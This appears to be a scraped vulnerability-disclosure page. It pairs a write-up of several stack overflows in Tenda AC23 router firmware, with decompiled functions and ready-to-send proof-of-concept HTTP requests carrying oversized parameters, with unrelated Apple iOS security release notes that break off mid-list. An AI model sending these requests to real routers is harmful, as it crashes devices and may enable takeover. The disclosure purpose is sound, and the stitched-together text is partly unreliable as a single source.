Tenda AC23 V16.03.07.45_cn was discovered to contain a stack overflow via the shareSpeed parameter in the fromSetWifiGusetBasic function.

**ac23**

版本信息：V16.03.07.45\_cn

**fromSetSysTime→sub\_496104→strcpy((char \*)v6, s);**

if ( !strcmp(v20, "sync") )
  {
    v19 = sub\_496104(a1);
    v14 = sub\_4C9C40(v19);
  }

int \_\_fastcall sub\_496104(int a1)
{
  int v2; // \[sp+1Ch\] \[+1Ch\]
  int v3; // \[sp+20h\] \[+20h\]
  char \*s; // \[sp+24h\] \[+24h\]
  int v5; // \[sp+28h\] \[+28h\]
  \_\_int16 v6\[8\]; // \[sp+2Ch\] \[+2Ch\] BYREF
  \_WORD v7\[8\]; // \[sp+3Ch\] \[+3Ch\] BYREF
  int v8\[2\]; // \[sp+4Ch\] \[+4Ch\] BYREF
  int v9\[5\]; // \[sp+54h\] \[+54h\] BYREF

  v5 = 0;
  v6\[0\] = 48;
  v6\[1\] = 0;
  v6\[2\] = 0;
  v6\[3\] = 0;
  v6\[4\] = 0;
  v6\[5\] = 0;
  v6\[6\] = 0;
  v6\[7\] = 0;
  strcpy((char \*)v7, "0");
  v7\[1\] = 0;
  v7\[2\] = 0;
  v7\[3\] = 0;
  v7\[4\] = 0;
  v7\[5\] = 0;
  v7\[6\] = 0;
  v7\[7\] = 0;
  v8\[0\] = 0;
  v8\[1\] = 0;
  v9\[0\] = 0;
  v9\[1\] = 0;
  v9\[2\] = 0;
  v9\[3\] = 0;
  s = (char \*)websGetVar(a1, "timeZone", &unk\_4DDAE4);
  v3 = websGetVar(a1, "timePeriod", &unk\_4DDAE4);
  v2 = websGetVar(a1, "ntpServer", "time.windows.com");
  if ( strchr(s, ':') )
  {
    sscanf(s, "%\[^:\]:%s", v6, v7);//stack overflow
  }
  else
  {
    strcpy((char \*)v6, s);
    strcpy((char \*)v7, "0");
  }
  SetValue("sys.timesyn", "1");
  SetValue("sys.timemode", "auto");
  SetValue("sys.timezone", v6);
  SetValue("sys.timenextzone", v7);
  SetValue("sys.timefixper", v3);
  SetValue("sys.timentpserver", v2);
  if ( !CommitCfm() )
    return 1;
  GetValue("sys.timesyn", v8);
  if ( atoi((const char \*)v8) == 1 )
    sprintf((char \*)v9, "op=%d", 3);
  else
    sprintf((char \*)v9, "op=%d", 2);
  send\_msg\_to\_netctrl(24, v9);
  return v5;
}

**poc**

POST /goform/SetSysTimeCfg HTTP/1.1
Host: 192.168.0.1
Content-Length: 787
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/system\_time.html?random=0.6878395284342707&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: password=1bbd886460827015e5d605ed44252251mzhcvb
Connection: close

timeType=sync&timePeriod=86400&ntpServer=time.windows.com&timeZone=aa:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&time=2000-01-01%2023%3A39%3A00

**formSetDeviceName→set\_device\_name→sprintf(v4, "%s;1", a1);**

int \_\_fastcall formSetDeviceName(int a1)
{
  int result; // $v0
  int v2; // \[sp+18h\] \[+18h\]
  const char \*v3; // \[sp+1Ch\] \[+1Ch\]
  const char \*v4; // \[sp+20h\] \[+20h\]
  int v5\[9\]; // \[sp+24h\] \[+24h\] BYREF

  v5\[0\] = 0;
  v5\[1\] = 0;
  v5\[2\] = 0;
  v5\[3\] = 0;
  v5\[4\] = 0;
  v5\[5\] = 0;
  v5\[6\] = 0;
  v5\[7\] = 0;
  v2 = 0;
  v4 = (const char \*)websGetVar(a1, "mac", &unk\_4DEB84);
  v3 = (const char \*)websGetVar(a1, "devName", &unk\_4DEB84);
  if ( set\_device\_name(v3, v4) )//stack\_overflow
  {
    sprintf((char \*)v5, "{\\"errCode\\":%d}", 1);
    result = websTransfer(a1, (const char \*)v5);
  }
  else
  {
    if ( !CommitCfm() )
      v2 = 1;
    sprintf((char \*)v5, "{\\"errCode\\":%d}", v2);
    result = websTransfer(a1, (const char \*)v5);
  }
  return result;
}

set\_device\_name

sprintf(v3, "client.devicename%s", (const char \*)v5);
sprintf(v4, "%s;1", a1);
SetValue(v3, v4);

**poc**

POST /goform/SetOnlineDevName HTTP/1.1
Host: 192.168.0.1
Content-Length: 264
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/system\_time.html?random=0.9865714904007963&
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Connection: close

mac=9c:fc:e8:da:9c:5b&devName=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

**setSchedWifi→ strcpy((char \*)ptr + 2, v8)**

int \_\_fastcall setSchedWifi(int a1)
{
  int v1; // $v0
  void \*ptr; // \[sp+30h\] \[+30h\]
  int i; // \[sp+34h\] \[+34h\]
  char \*s; // \[sp+38h\] \[+38h\]
  char \*nptr; // \[sp+3Ch\] \[+3Ch\]
  const char \*v7; // \[sp+40h\] \[+40h\]
  const char \*v8; // \[sp+44h\] \[+44h\]
  char \*v9; // \[sp+48h\] \[+48h\]
  int v10; // \[sp+4Ch\] \[+4Ch\]
  int v11; // \[sp+50h\] \[+50h\]
  int v12\[2\]; // \[sp+54h\] \[+54h\] BYREF
  int v13; // \[sp+5Ch\] \[+5Ch\] BYREF
  int v14; // \[sp+60h\] \[+60h\] BYREF
  int v15; // \[sp+64h\] \[+64h\] BYREF
  int v16; // \[sp+68h\] \[+68h\] BYREF
  int v17; // \[sp+6Ch\] \[+6Ch\] BYREF
  int v18; // \[sp+70h\] \[+70h\] BYREF
  int v19; // \[sp+74h\] \[+74h\] BYREF
  char v20\[256\]; // \[sp+78h\] \[+78h\] BYREF
  char v21\[256\]; // \[sp+178h\] \[+178h\] BYREF

  v11 = 1;
  v10 = 1;
  v12\[0\] = 0;
  v12\[1\] = 0;
  v13 = 1;
  v14 = 1;
  v15 = 1;
  v16 = 1;
  v17 = 1;
  v18 = 1;
  v19 = 1;
  i = 0;
  memset(v20, 0, sizeof(v20));
  memset(v21, 0, sizeof(v21));
  v9 = (char \*)websGetVar(a1, "schedWifiEnable", "1");
  v8 = (const char \*)websGetVar(a1, "schedStartTime", &unk\_4D7C58);
  v7 = (const char \*)websGetVar(a1, "schedEndTime", &unk\_4D7C58);
  nptr = (char \*)websGetVar(a1, "timeType", "0");
  s = (char \*)websGetVar(a1, "day", "1,1,1,1,1,1,1");
  v1 = wifi\_get\_mibname("wlan", "enable", v20);
  GetValue(v1, v12);
  if ( !LOBYTE(v12\[0\]) )
    strcpy((char \*)v12, "1");
  if ( atoi(nptr) )
    sscanf(s, "%d,%d,%d,%d,%d,%d,%d", &v13, &v14, &v15, &v16, &v17, &v18, &v19);
  SetValue("sys.sched.wifi.timeType", nptr);
  ptr = malloc(0x19u);
  v10 = atoi(v9);
  if ( ptr )
  {
    \*(\_BYTE \*)ptr = atoi((const char \*)v12) != 0;
    \*((\_BYTE \*)ptr + 1) = atoi(v9) != 0;
    strcpy((char \*)ptr + 2, v8);
    strcpy((char \*)ptr + 10, v7);
    for ( i = 0; i < 7; ++i )
      \*((\_BYTE \*)ptr + i + 18) = \*(&v13 + i) != 0;
    sub\_461D5C(ptr, 0);
    free(ptr);
    v11 = 0;
  }
  CommitCfm();
  if ( v10 )
  {
    sprintf(v21, "op=%d", 1);
    send\_msg\_to\_netctrl(62, v21);
    v11 = 0;
  }
  websWrite(
    a1,
    "HTTP/1.1 200 OK\\nContent-type: text/plain; charset=utf-8\\nPragma: no-cache\\nCache-Control: no-cache\\n\\n");
  websWrite(a1, "{\\"errCode\\":%d}", v11);
  return websDone(a1, 200);
}

**poc**

POST /goform/openSchedWifi HTTP/1.1
Host: 192.168.0.1
Content-Length: 102
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/wifi\_time.html?random=0.05230918147386965&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: password=1bbd886460827015e5d605ed44252251aoccvb
Connection: close

schedWifiEnable=1&schedStartTime=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&schedEndTime=07%3A00&timeType=1&day=1%2C1%2C1%2C1%2C1%2C0%2C0

**fromSetWirelessRepeat→sub\_45CD64→sub\_45CAD8→sub\_45BB10**

if ( strcmp(v14, "none") )
  {
    if ( strcmp(v14, "wpapsk") )
      return -1;
    v13 = (char \*)websGetVar(a1, "wpapsk\_type", "wpa&wpa2");
    v12 = (char \*)websGetVar(a1, "wpapsk\_crypto", "aes");
    s = (char \*)websGetVar(a1, "wpapsk\_key", &unk\_4D72FC);
    if ( !\*s && strlen(s) < 8 )
      return -1;
    if ( !strcmp(v13, "wpa") )
    {
      strcpy(v20, "psk");
    }
    else if ( !strcmp(v13, "wpa2") )
    {
      strcpy(v20, "psk2");
    }
    else
    {
      strcpy(v20, "psk+psk2");
    }
    if ( !strcmp(v12, "tkip&aes") )
      strcpy(v21, "tkip+aes");
    else
      strcpy(v21, v12);
    v6 = wifi\_get\_mibname(a3, "extend\_wpapsk\_type", v18);
    SetValue(v6, v20);
    v7 = wifi\_get\_mibname(a3, "extend\_wpapsk\_crypto", v18);
    SetValue(v7, v21);
    v8 = wifi\_get\_mibname(a3, "extend\_wpapsk\_key", v18);
    SetValue(v8, s);
  }

**poc**

POST /goform/WifiExtraSet HTTP/1.1
Host: 192.168.0.1
Content-Length: 247
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/wifi\_time.html?random=0.05230918147386965&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: password=1bbd886460827015e5d605ed44252251fsacvb
Connection: close

wifi\_chkHz=1&wl\_mode=wisp&wl\_enbale=1&country\_code=CN&wpsEn=0&guestEn=0&iptvEn=0&wifiTimerEn=1&smartSaveEn=1&dmzEn=1&handset=0&ssid=fcniux&wpapsk\_key=11111111&security=wpapsk&wpapsk\_type=wpa&wpapsk\_crypto=aaaaaaaaaaaaaaaaaaaaaaaaaaaa&mac=undifined

**fromSetWifiGusetBasic**

\_\_src = (char \*)websGetVar(param\_1,"shareSpeed",&DAT\_004d83a0);
  strcpy((char \*)&local\_124,\_\_src);

**poc**

POST /goform/WifiGuestSet HTTP/1.1
Host: 192.168.0.1
Content-Length: 531
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/main.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: password=1bbd886460827015e5d605ed44252251tyacvb
Connection: close

guestEn=1&guestEn\_5g=1&guestSecurity=wpapsk&guestSecurity\_5g=wpapsk&guestSsid=Tenda\_VIP&guestSsid\_5g=Tenda\_VIP\_5G&guestWrlPwd=11111111&guestWrlPwd\_5g=11111111&effectiveTime=8&shareSpeed=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

**formSetQosBand**

formSetQosBand→set\_qosMib\_list→strcpy(v8, s);

int \_\_fastcall formSetQosBand(int a1)
{
int v2; // \[sp+30h\] \[+30h\]
int v3\[8\]; // \[sp+34h\] \[+34h\] BYREF
char v4\[256\]; // \[sp+54h\] \[+54h\] BYREF
int v5\[8\]; // \[sp+154h\] \[+154h\] BYREF
int v6\[8\]; // \[sp+174h\] \[+174h\] BYREF
int v7\[5\]; // \[sp+194h\] \[+194h\] BYREF

v3\[0\] = 0;
v3\[1\] = 0;
v3\[2\] = 0;
v3\[3\] = 0;
v3\[4\] = 0;
v3\[5\] = 0;
v3\[6\] = 0;
v3\[7\] = 0;
memset(v4, 0, sizeof(v4));
v2 = websGetVar(a1, "list", &unk\_4DEB84);
unSetQosOldMiblist();
set\_qosoldMib\_list();
unSetQosMiblist();
set\_qosMib\_list(v2, 10);

int \_\_fastcall set\_qosMib\_list(const char \*a1, char a2)
{
  char \*v2; // $v0
  char \*s; // \[sp+24h\] \[+24h\]
  const char \*v5; // \[sp+28h\] \[+28h\]
  int v6; // \[sp+2Ch\] \[+2Ch\]
  int v7; // \[sp+30h\] \[+30h\] BYREF
  char v8\[256\]; // \[sp+34h\] \[+34h\] BYREF
  int v9; // \[sp+134h\] \[+134h\] BYREF
  int v10; // \[sp+138h\] \[+138h\]
  int v11\[8\]; // \[sp+13Ch\] \[+13Ch\] BYREF
  int v12\[4\]; // \[sp+15Ch\] \[+15Ch\] BYREF
  int v13\[4\]; // \[sp+16Ch\] \[+16Ch\] BYREF
  char v14\[256\]; // \[sp+17Ch\] \[+17Ch\] BYREF
  int v15; // \[sp+27Ch\] \[+27Ch\]
  int v16; // \[sp+280h\] \[+280h\]
  int v17; // \[sp+284h\] \[+284h\]
  int v18; // \[sp+288h\] \[+288h\]

  v7 = 0;
  memset(v8, 0, sizeof(v8));
  v9 = 0;
  v10 = 0;
  v11\[0\] = 0;
  v11\[1\] = 0;
  v11\[2\] = 0;
  v11\[3\] = 0;
  v11\[4\] = 0;
  v11\[5\] = 0;
  v11\[6\] = 0;
  v11\[7\] = 0;
  v12\[0\] = 0;
  v12\[1\] = 0;
  v12\[2\] = 0;
  v12\[3\] = 0;
  v13\[0\] = 0;
  v13\[1\] = 0;
  v13\[2\] = 0;
  v13\[3\] = 0;
  memset(v14, 0, sizeof(v14));
  s = (char \*)a1;
  v2 = strchr(a1, a2);
  while ( v2 )
  {
    v6 = 0;
    \*v2 = 0;
    v5 = v2 + 1;
    memset(v8, 0, sizeof(v8));
    strcpy(v8, s);
    if ( v8\[0\] == 59 )
    {
      sscanf(v8, ";%\[^;\];%\[^;\];%\[^;\];%\[^;\];", &v9, v11, v13, v12);
    }
    else
    {
      sscanf(v8, "%\[^\\r\]\\r%\[^\\r\]\\r%\[^\\r\]\\r%s", v14, v11, v13, v12);
      v6 = 1;
    }
    if ( atoi((const char \*)v13) || atoi((const char \*)v12) )
    {
      if ( v6 == 1 )
        set\_device\_name(v14, v11);

这个参数长度不加以限制还会影响set\_device\_name

**poc**

POST /goform/SetNetControlList HTTP/1.1
Host: 192.168.0.1
Content-Length: 791
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/net\_control.html?random=0.0444079600832199&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: password=1bbd886460827015e5d605ed44252251aticvb
Connection: close

list=DESKTOP-V29RD1268aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:77:24:54:a9:c000
Unknownaaaaaaaaaaaaaaaaaaaaaaaaaaaaunknown00

**setSmartPowerManagement**

    nptr = (char \*)websGetVar(a1, "powerSavingEn", "0");
  s = (char \*)websGetVar(a1, "time", "00:00-7:30");
  v4 = websGetVar(a1, "powerSaveDelay", "1");
  v3 = (char \*)websGetVar(a1, "ledCloseType", "allClose");
  if ( nptr && s && v4 && v3 )
  {
    sscanf(s, "%\[^:\]:%\[^-\]-%\[^:\]:%s", v7, v8, v9, v10);
    sprintf(v11, "%s:%s", (const char \*)v7, (const char \*)v8);
    sprintf(v12, "%s:%s", (const char \*)v9, (const char \*)v10);
    GetValue("sys.sched.led.closetype", v13);

**poc**

POST /goform/PowerSaveSet HTTP/1.1
Host: 192.168.0.1
Content-Length: 803
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/sleep\_mode.html?random=0.7222154127483253&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: password=1bbd886460827015e5d605ed44252251csvcvb
Connection: close

powerSavingEn=1&time=0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa0%3A00-07%3A00&ledCloseType=allClose&powerSaveDelay=1

**formSetFirewallCfg**

int \_\_fastcall formSetFirewallCfg(int a1)
{
  int v1; // $a1
  int v2; // $a2
  \_BOOL4 v4; // \[sp+20h\] \[+20h\]
  char \*s; // \[sp+24h\] \[+24h\]
  int v6\[2\]; // \[sp+28h\] \[+28h\] BYREF
  char v7\[64\]; // \[sp+30h\] \[+30h\] BYREF
  int v8\[2\]; // \[sp+70h\] \[+70h\] BYREF
  char v9\[64\]; // \[sp+78h\] \[+78h\] BYREF

  v6\[0\] = 0;
  v6\[1\] = 0;
  memset(v7, 0, sizeof(v7));
  v8\[0\] = 0;
  v8\[1\] = 0;
  memset(v9, 0, sizeof(v9));
  s = (char \*)websGetVar(a1, "firewallEn", "1111");
  if ( strlen(s) \>\= 4 )
  {
    strcpy((char \*)v6, s);

**poc**

POST /goform/SetFirewallCfg HTTP/1.1
Host: 192.168.0.1
Content-Length: 764
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/firewall.html?random=0.3855955678045606&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: password=1bbd886460827015e5d605ed44252251izccvb
Connection: close

firewallEn=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111

CVE-2022-43105: IOT_FIRMWARE/ac23.md at main · ppcrab/IOT_FIRMWARE

Tenda AC23 V16.03.07.45_cn was discovered to contain a stack overflow via the wpapsk_crypto parameter in the fromSetWirelessRepeat function.

CVE-2022-43104: IOT_FIRMWARE/ac23.md at main · ppcrab/IOT_FIRMWARE

Tenda AC23 V16.03.07.45_cn was discovered to contain a stack overflow via the list parameter in the formSetQosBand function.

CVE-2022-43103: IOT_FIRMWARE/ac23.md at main · ppcrab/IOT_FIRMWARE

Tenda AC23 V16.03.07.45_cn was discovered to contain a stack overflow via the devName parameter in the formSetDeviceName function.

CVE-2022-43101: IOT_FIRMWARE/ac23.md at main · ppcrab/IOT_FIRMWARE

Tenda AC23 V16.03.07.45_cn was discovered to contain a stack overflow via the timeZone parameter in the fromSetSysTime function.

CVE-2022-43102: IOT_FIRMWARE/ac23.md at main · ppcrab/IOT_FIRMWARE

A memory corruption issue existed in the processing of ICC profiles. This issue was addressed with improved input validation. This issue is fixed in macOS Ventura 13. Processing a maliciously crafted image may lead to arbitrary code execution.

CVE-2022-26730: About the security content of macOS Ventura 13

This issue was addressed with improved entitlements. This issue is fixed in iOS 16.1 and iPadOS 16. An app may be able to record audio using a pair of connected AirPods.

Released October 24, 2022

**Apple Neural Engine**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges 

Description: The issue was addressed with improved memory handling. 

CVE-2022-32932: Mohamed Ghannam (@\_simo36)

Entry added October 27, 2022

**AppleMobileFileIntegrity**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: An app may be able to modify protected parts of the file system

Description: This issue was addressed by removing additional entitlements.

CVE-2022-42825: Mickey Jin (@patch1t)

**Audio**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: Parsing a maliciously crafted audio file may lead to disclosure of user information

Description: The issue was addressed with improved memory handling.

CVE-2022-42798: Anonymous working with Trend Micro Zero Day Initiative

Entry added October 27, 2022

**AVEVideoEncoder**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved bounds checks.

CVE-2022-32940: ABC Research s.r.o.

**Backup**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: An app may be able to access iOS backups

Description: A permissions issue was addressed with additional restrictions. 

CVE-2022-32929: Csaba Fitzl (@theevilbit) of Offensive Security

Entry added October 27, 2022

**CFNetwork**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: Processing a maliciously crafted certificate may lead to arbitrary code execution

Description: A certificate validation issue existed in the handling of WKWebView. This issue was addressed with improved validation.

CVE-2022-42813: Jonathan Zhang of Open Computing Facility (ocf.berkeley.edu)

**Core Bluetooth**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: An app may be able to record audio using a pair of connected AirPods

Description: This issue was addressed with improved entitlements.

CVE-2022-32946: Guilherme Rambo of Best Buddy Apps (rambo.codes)

**FaceTime**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: A user may be able to view restricted content from the lock screen 

Description: A lock screen issue was addressed with improved state management. 

CVE-2022-32935: Bistrit Dahal

Entry added October 27, 2022

**GPU Drivers**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-32947: Asahi Lina (@LinaAsahi)

**Graphics Driver**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges 

Description: The issue was addressed with improved bounds checks. 

CVE-2022-32939: Willy R. Vasquez of The University of Texas at Austin

Entry added October 27, 2022

**IOHIDFamily**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: An app may cause unexpected app termination or arbitrary code execution

Description: A memory corruption issue was addressed with improved state management.

CVE-2022-42820: Peter Pan ZhenPeng of STAR Labs

**IOKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with improved locking.

CVE-2022-42806: Tingting Yin of Tsinghua University

**Kernel**

